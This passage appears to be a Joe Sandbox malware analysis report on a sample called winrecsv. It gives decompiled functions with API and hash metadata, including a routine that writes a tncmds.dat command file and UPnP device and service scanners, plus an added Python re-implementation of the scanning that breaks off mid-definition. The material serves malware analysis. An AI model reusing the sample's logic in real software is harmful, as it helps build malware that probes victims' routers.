                                                                                  • Instruction Fuzzy Hash: 29512C759012289BDB35CB50CC99BD9B3BCAB48705F1081E9E60DAA2C0D7B86FC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E0040C040(LONG* _a4, intOrPtr _a8) {
                                                                                  				int _v8;
                                                                                  				long _v12;
                                                                                  				LONG* _v16;
                                                                                  				signed char _v17;
                                                                                  				long _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _t57;
                                                                                  				intOrPtr _t80;
                                                                                  
                                                                                  				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                  				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                  				_v12 = 0;
                                                                                  				if(_a4 != 0) {
                                                                                  					_v16 = _a4;
                                                                                  					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                  						_v17 = 0 | _a8 != 0xffffffff;
                                                                                  						while(1 != 0) {
                                                                                  							_v24 = 0;
                                                                                  							EnterCriticalSection( &(_v16[1]));
                                                                                  							_v28 = 0;
                                                                                  							while(_v28 <  *_v16) {
                                                                                  								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                  									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                  									asm("sbb eax, eax");
                                                                                  									_v24 =  ~_t57 + 1 + _v24;
                                                                                  								} else {
                                                                                  									_v24 = _v24 + 1;
                                                                                  								}
                                                                                  								_v28 = _v28 + 1;
                                                                                  							}
                                                                                  							LeaveCriticalSection( &(_v16[1]));
                                                                                  							if(_v24 !=  *_v16) {
                                                                                  								if((_v17 & 0x000000ff) == 0) {
                                                                                  									L15:
                                                                                  									Sleep(1);
                                                                                  									continue;
                                                                                  								} else {
                                                                                  									_t80 = _a8 - 1;
                                                                                  									_a8 = _t80;
                                                                                  									if(_t80 != 0) {
                                                                                  										goto L15;
                                                                                  									} else {
                                                                                  									}
                                                                                  								}
                                                                                  							} else {
                                                                                  								_v12 = 1;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L16:
                                                                                  				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                  				return _v12;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C046
                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C04D
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C058
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF,?,0040F024), ref: 0040C05F
                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040C082
                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040C0B7
                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040C102
                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040C11E
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040C14E
                                                                                  • GetCurrentThread.KERNEL32 ref: 0040C15D
                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040E56E,?,000000FF), ref: 0040C164
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 3862671961-0
                                                                                  • Opcode ID: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction ID: b67d03a003be484ef9903f40ca498cf56af242f5343ef7d43787b118d94c6999
                                                                                  • Opcode Fuzzy Hash: 5b3e761f1863bbc4b3393cbcc79310fac30a5adf336bc6d3d95560012fa03e52
                                                                                  • Instruction Fuzzy Hash: E9414C74900209EBDB14DFA4D884BAEBB71FB48305F108266E915BB381D7799A81CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040EBE0(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                  				long _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t73;
                                                                                  				void* _t106;
                                                                                  				void* _t108;
                                                                                  
                                                                                  				_t108 = __eax;
                                                                                  				_t106 = __ecx;
                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                  					_a4 = 1;
                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                  					_a6 = 0;
                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				InterlockedExchange(_t106 + 4, E0040C210());
                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                  				if(_t64 == 0) {
                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                  							return E0040E5C0(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                  							_push(_t106);
                                                                                  							return E0040E960(_t108);
                                                                                  						}
                                                                                  					} else {
                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t73 = _t64 - 1;
                                                                                  					if(_t73 != 0) {
                                                                                  						L14:
                                                                                  						return _t73;
                                                                                  					} else {
                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v8 = _t106 + 8;
                                                                                  							_v4 = __ebx;
                                                                                  							E0040E5C0(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  							_t73 = E0040EB70(_t106);
                                                                                  							if(_t73 != 0) {
                                                                                  								goto L14;
                                                                                  							} else {
                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                  								return _t73;
                                                                                  							}
                                                                                  						} else {
                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040EC06
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC30
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC43
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040EC54
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ECDB
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ED76
                                                                                  • setsockopt.WS2_32 ref: 0040EDAC
                                                                                  • closesocket.WS2_32(?), ref: 0040EDB9
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 671207744-0
                                                                                  • Opcode ID: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction ID: a63a62e2eddc4c6ea33aec9a9dae6784646f40805859537cb5bfc137b0e9617d
                                                                                  • Opcode Fuzzy Hash: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction Fuzzy Hash: CC51B175608702AFC704DF29D488B96FBE0BF88314F008A2EE49D83351D735A554CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 97%
                                                                                  			E00404580(intOrPtr _a12, intOrPtr _a16) {
                                                                                  				signed int _v5;
                                                                                  				void* _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				long _v36;
                                                                                  				signed char _t76;
                                                                                  				void* _t79;
                                                                                  				intOrPtr _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				signed char _t91;
                                                                                  				signed int _t141;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				void* _t169;
                                                                                  
                                                                                  				_v5 = 0;
                                                                                  				EnterCriticalSection(0x4143f0);
                                                                                  				_t111 = _a12;
                                                                                  				_t76 = E0040B550(_a12, _a16);
                                                                                  				_t159 = _t158 + 8;
                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                  					_t79 = E0040B4F0(_t111, _a12);
                                                                                  					_t160 = _t159 + 4;
                                                                                  					_v12 = _t79;
                                                                                  					if(_v12 != 0) {
                                                                                  						_v5 = 1;
                                                                                  						_v13 = 0;
                                                                                  						_v20 = 0;
                                                                                  						while(1) {
                                                                                  							_t169 = _v20 -  *0x41440c; // 0x0
                                                                                  							if(_t169 >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_v24 = _v20 * 0x110 +  *0x414408;
                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x108)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00409020(_a12, _a16);
                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x100)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040AE60( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                  								E004058A0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_t160 = _t160 + 0x3c;
                                                                                  								_v13 = 1;
                                                                                  							} else {
                                                                                  								_v20 = _v20 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                  							_t91 = E004040F0(_a16, _v12, _a12, _a16, 1);
                                                                                  							_t160 = _t160 + 0x10;
                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                  								 *0x41440c = 0;
                                                                                  								_v5 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						E00408FB0(_v12);
                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                  							_v28 = CreateFileW("C:\Users\frontdesk\tncmds.dat", 0x40000000, 0, 0, 2, 2, 0);
                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                  							if(_v28 != 0xffffffff) {
                                                                                  								_v32 = 0;
                                                                                  								while(1) {
                                                                                  									__eflags = _v32 -  *0x41440c; // 0x0
                                                                                  									if(__eflags >= 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t87 =  *0x414408; // 0x0
                                                                                  									_t88 =  *0x414408; // 0x0
                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                  									_t141 = _v32 + 1;
                                                                                  									__eflags = _t141;
                                                                                  									_v32 = _t141;
                                                                                  								}
                                                                                  								FlushFileBuffers(_v28);
                                                                                  								CloseHandle(_v28);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x4143f0);
                                                                                  				return _v5;
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 00404591
                                                                                  • CreateFileW.KERNEL32(C:\Users\user\tncmds.dat,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A827,006A0266), ref: 00404740
                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004047A2
                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047AE
                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047B8
                                                                                  • LeaveCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 004047C3
                                                                                  Strings
                                                                                  • C:\Users\user\tncmds.dat, xrefs: 0040473B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                  • String ID: C:\Users\user\tncmds.dat
                                                                                  • API String ID: 2945370292-1428318279
                                                                                  • Opcode ID: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction ID: 01e06390de1b97125c550d85264ffb387e1c01f9fade460cde3dda761564bb80
                                                                                  • Opcode Fuzzy Hash: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction Fuzzy Hash: 4A71A3B5A00209ABCB04CF94D985FEFB7B5BB88304F148169E505B7382D779A941CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
			/* Scans an MSXML node list (_a4) and returns the first <device> element whose
			   <deviceType> text equals _a8 (case-insensitive), or NULL. COM calls go through
			   raw vtable slots; the offsets match IXMLDOMNodeList (0x1c get_item, 0x20
			   get_length) and IXMLDOMNode (0x08 Release, 0x68 get_text, 0xa4 get_baseName).
			   The interface types are inferred from those offsets, not recovered by the
			   decompiler. The matching node is returned still holding its reference; every
			   other node is Released. "device"/"deviceType" are the element names used in
			   UPnP device description XML. */
			E0040CC90(intOrPtr* _a4, WCHAR* _a8) {
				char _v8;          /* node count */
				WCHAR* _v12;       /* result node (returned) */
				WCHAR* _v16;       /* loop index */
				void* _v20;        /* current node */
				WCHAR* _v24;       /* baseName BSTR of current node */
				intOrPtr* _v28;    /* child <deviceType> node from E0040C5B0 */
				WCHAR* _v32;       /* text BSTR of that child */
				intOrPtr* _t65;
				void* _t99;

				_v12 = 0;
				_v8 = 0;
				_push( &_v8);
				_push(_a4);
				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {   /* get_length(&count) */
					_v16 = 0;
					while(_v16 < _v8) {
						_v20 = 0;
						_push( &_v20);
						_push(_v16);
						_push(_a4);
						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {   /* get_item(index, &node) */
							L21:
							_v16 = _v16 + 1;
							continue;
						} else {
							_v24 = 0;
							_push( &_v24);
							_push(_v20);
							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {   /* get_baseName(&bstr) */
								if(lstrcmpiW(_v24, L"device") == 0) {
									_t65 = E0040C5B0(_v20, L"deviceType");   /* child lookup by name; caller cleans 8 bytes of args */
									_t99 = _t99 + 8;
									_v28 = _t65;
									if(_v28 != 0) {
										_v32 = 0;
										_push( &_v32);
										_push(_v28);
										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {   /* get_text(&bstr) */
											if(lstrcmpiW(_v32, _a8) == 0) {   /* case-insensitive type match */
												_v12 = _v20;
											}
											__imp__#6(_v32);   /* OLEAUT32 ordinal 6: SysFreeString */
										}
										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);   /* Release child node */
									}
								}
								__imp__#6(_v24);   /* SysFreeString(baseName) */
							}
							if(_v12 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);   /* Release non-matching node */
								goto L21;
							} else {
							}
						}
						goto L22;
					}
				}
				L22:
				return _v12;
			}












Statement addresses (listing order): 0x0040cc96 0x0040cc9d 0x0040cca7 0x0040ccb0 0x0040ccb8 0x0040ccc8 0x0040ccda 0x0040cce6 0x0040ccf0 0x0040ccf4 0x0040ccfd 0x0040cd05 0x0040cde3 0x0040ccd7 0x00000000 0x0040cd15 0x0040cd15 0x0040cd1f 0x0040cd28 0x0040cd33 0x0040cd54 0x0040cd5f 0x0040cd64 0x0040cd67 0x0040cd6e 0x0040cd70 0x0040cd7a 0x0040cd83 0x0040cd8b 0x0040cda3 0x0040cda8 0x0040cda8 0x0040cdaf 0x0040cdaf 0x0040cdc1 0x0040cdc1 0x0040cd6e 0x0040cdc7 0x0040cdc7 0x0040cdd1 0x0040cde1 0x00000000 0x00000000 0x0040cdd3 0x0040cdd1 0x00000000 0x0040cd05 0x0040ccda 0x0040cde8 0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction ID: 46634be8c8d3b4bec74d72c832fec089d40fd577d228b9d0a634236a651e6f02
                                                                                  • Opcode Fuzzy Hash: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction Fuzzy Hash: 2341DA75A0020ADFCB04DF98C884BEFBBB5BF48304F108269E515A7390D778AE81CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
			/* Same scan as E0040CC90, but over <service> elements: returns the first node in
			   the MSXML node list (_a4) whose base name is "service" and whose <serviceType>
			   child text equals _a8 (case-insensitive), or NULL. Vtable slots match
			   IXMLDOMNodeList (0x1c get_item, 0x20 get_length) and IXMLDOMNode (0x08 Release,
			   0x68 get_text, 0xa4 get_baseName); the interface types are inferred from the
			   offsets. The matched node keeps its reference; all others are Released. */
			E0040CAB0(intOrPtr* _a4, WCHAR* _a8) {
				char _v8;          /* node count */
				WCHAR* _v12;       /* result node (returned) */
				WCHAR* _v16;       /* loop index */
				void* _v20;        /* current node */
				WCHAR* _v24;       /* baseName BSTR of current node */
				intOrPtr* _v28;    /* child <serviceType> node from E0040C5B0 */
				WCHAR* _v32;       /* text BSTR of that child */
				intOrPtr* _t65;
				void* _t99;

				_v12 = 0;
				_v8 = 0;
				_push( &_v8);
				_push(_a4);
				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {   /* get_length(&count) */
					_v16 = 0;
					while(_v16 < _v8) {
						_v20 = 0;
						_push( &_v20);
						_push(_v16);
						_push(_a4);
						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {   /* get_item(index, &node) */
							L21:
							_v16 = _v16 + 1;
							continue;
						} else {
							_v24 = 0;
							_push( &_v24);
							_push(_v20);
							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {   /* get_baseName(&bstr) */
								if(lstrcmpiW(_v24, L"service") == 0) {
									_t65 = E0040C5B0(_v20, L"serviceType");   /* child lookup by name; caller cleans 8 bytes of args */
									_t99 = _t99 + 8;
									_v28 = _t65;
									if(_v28 != 0) {
										_v32 = 0;
										_push( &_v32);
										_push(_v28);
										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {   /* get_text(&bstr) */
											if(lstrcmpiW(_v32, _a8) == 0) {   /* case-insensitive type match */
												_v12 = _v20;
											}
											__imp__#6(_v32);   /* OLEAUT32 ordinal 6: SysFreeString */
										}
										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);   /* Release child node */
									}
								}
								__imp__#6(_v24);   /* SysFreeString(baseName) */
							}
							if(_v12 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);   /* Release non-matching node */
								goto L21;
							} else {
							}
						}
						goto L22;
					}
				}
				L22:
				return _v12;
			}












Statement addresses (listing order): 0x0040cab6 0x0040cabd 0x0040cac7 0x0040cad0 0x0040cad8 0x0040cae8 0x0040cafa 0x0040cb06 0x0040cb10 0x0040cb14 0x0040cb1d 0x0040cb25 0x0040cc03 0x0040caf7 0x00000000 0x0040cb35 0x0040cb35 0x0040cb3f 0x0040cb48 0x0040cb53 0x0040cb74 0x0040cb7f 0x0040cb84 0x0040cb87 0x0040cb8e 0x0040cb90 0x0040cb9a 0x0040cba3 0x0040cbab 0x0040cbc3 0x0040cbc8 0x0040cbc8 0x0040cbcf 0x0040cbcf 0x0040cbe1 0x0040cbe1 0x0040cb8e 0x0040cbe7 0x0040cbe7 0x0040cbf1 0x0040cc01 0x00000000 0x00000000 0x0040cbf3 0x0040cbf1 0x00000000 0x0040cb25 0x0040cafa 0x0040cc08 0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction ID: 6fe4328499d7c23ea6979e2b1e9447d84fd35b94008c8ce13c1bdcec141f7028
                                                                                  • Opcode Fuzzy Hash: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction Fuzzy Hash: 3641FB75A0020ADFDB04CF98D885BAFB7B5BF48304F208269E515B7390D778AD85CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
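The two decompiled functions above, E0040CC90 and E0040CAB0, are one scan with two sets of element names: walk a node list, keep the first <device> (or <service>) whose <deviceType> (or <serviceType>) child text equals the argument case-insensitively, and release everything else. The Python below is an added illustration of that matching logic over a constructed UPnP device description; it is not code from the report or from the analysed sample. The sample XML, the nested deviceList layout and the WANIPConnection target are assumptions made for the example, not behaviour the report attributes to the malware.

```python
"""Flat type-match search over a UPnP device description, mirroring the
two decompiled node-list scans (E0040CC90: <device>/<deviceType>,
E0040CAB0: <service>/<serviceType>). Added illustration; not the sample's
own code. Standard library only, no network access."""
import xml.etree.ElementTree as ET

# Constructed sample description (an Internet Gateway Device layout as
# served by many routers). It is test data for this example only.
SAMPLE_DESCRIPTION = b"""<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <friendlyName>Example Router</friendlyName>
    <deviceList>
      <device>
        <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
        <deviceList>
          <device>
            <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
            <serviceList>
              <service>
                <serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
                <controlURL>/ctl/IPConn</controlURL>
              </service>
            </serviceList>
          </device>
        </deviceList>
      </device>
    </deviceList>
  </device>
</root>
"""


def local_name(elem):
    """Tag without its namespace: what IXMLDOMNode::get_baseName returns."""
    return elem.tag.rsplit("}", 1)[-1]


def child_text(elem, name):
    """Text of the first direct child named `name`, or None. Plays the role
    of E0040C5B0 (child lookup by name) followed by IXMLDOMNode::get_text."""
    for child in elem:
        if local_name(child) == name:
            return child.text or ""
    return None


def find_by_type(nodes, element_name, type_child, wanted):
    """First node in `nodes` whose base name is `element_name` and whose
    `type_child` text equals `wanted` case-insensitively (lstrcmpiW
    semantics, approximated with str.lower). Flat scan only, like the
    decompiled loop: nested <deviceList>/<serviceList> are not entered."""
    for node in nodes:
        if local_name(node) != element_name:
            continue
        text = child_text(node, type_child)
        if text is not None and text.lower() == wanted.lower():
            return node
    return None


def find_device(nodes, device_type):
    """Counterpart of E0040CC90."""
    return find_by_type(nodes, "device", "deviceType", device_type)


def find_service(nodes, service_type):
    """Counterpart of E0040CAB0."""
    return find_by_type(nodes, "service", "serviceType", service_type)


def locate(description, path):
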